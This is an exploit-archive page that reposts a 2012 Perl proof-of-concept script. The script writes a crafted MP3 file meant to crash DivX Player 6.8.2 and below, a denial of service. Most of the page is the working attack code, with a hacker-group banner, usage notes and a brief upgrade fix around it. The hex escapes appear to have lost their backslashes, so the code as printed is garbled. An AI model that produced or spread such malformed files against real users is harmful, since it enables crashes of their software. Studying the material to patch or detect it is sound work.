Home / exploits Divx 6.8.2 Denial Of Service
Posted on 21 August 2012
#!/usr/bin/perl # 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' __ /'__` / \__ /'__` 0 # 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 # 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 # 0 / / / / \__/ \_ \_ / 1 # 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 # 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 # 1 \____/ >> Exploit database separated by exploit 0 # 0 /___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 Pentesting/exploit coding/bug research 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Exploit Title: Divx 6.8.2 - Denial Of Service Vulnerability . # Date: 18 August 2012 # Author: Dark-Puzzle # Author's Website : www.datasec.x90x.net # Risk : Medium # Vendor Website : http://www.divx.com # Version: 6.8.2 or Lower (Other Versions were not tested ). # Category: DoS/PoC # Tested on: Windows Xp Service Pack 2 . #Executing this Arbitary MP3 file Lead to a Denial Of Service Vuln Causing a program Crash . #-------PoC------- # usage : perl divxdOs.pl my $id="x55x46x49x44x20x55x6ex69x71x75x65x20x66x69x6cx65x20x69x64x65x6ex74x69x66x69x65x72x0dx0ax55x53x45x52x20x54x65x72x6dx73x20x6fx66x20x75x73x65x0dx0ax55x53x4cx54x20x55x6ex73x79x6ex63x68x72x6fx6ex69x7ax65x64x20x6cx79x72x69x63x2fx74x65x78x74x20x74x72x61x6ex73x63x72x69x70x74x69x6fx6e"; my $cdat= "x0cx0bx0bx0cx19x12x13x0fx14x1dx1ax1fx1ex1dx1ax1cx1cx20x24x2ex27x20x22x2cx23x1cx1cx28x2bx78x29x2cx30x27x39x3dx30x3cx2ex61x78x32xc3x83xc2xbfxc3x83xefxbfxbd"; my $file= "dark-puzzle.mp3"; open($FILE,">$file"); print $FILE $id.$cdat; close($FILE); print "MP3 File Created , Enjoy !! "; #------Solution------- #Upgrade to the Last Version Of DivX Player . #-----Greetz 2 :------ # Inj3ct0r Team - Packetstormsecurity.org - Jigsaw - Dark-Soldier ...
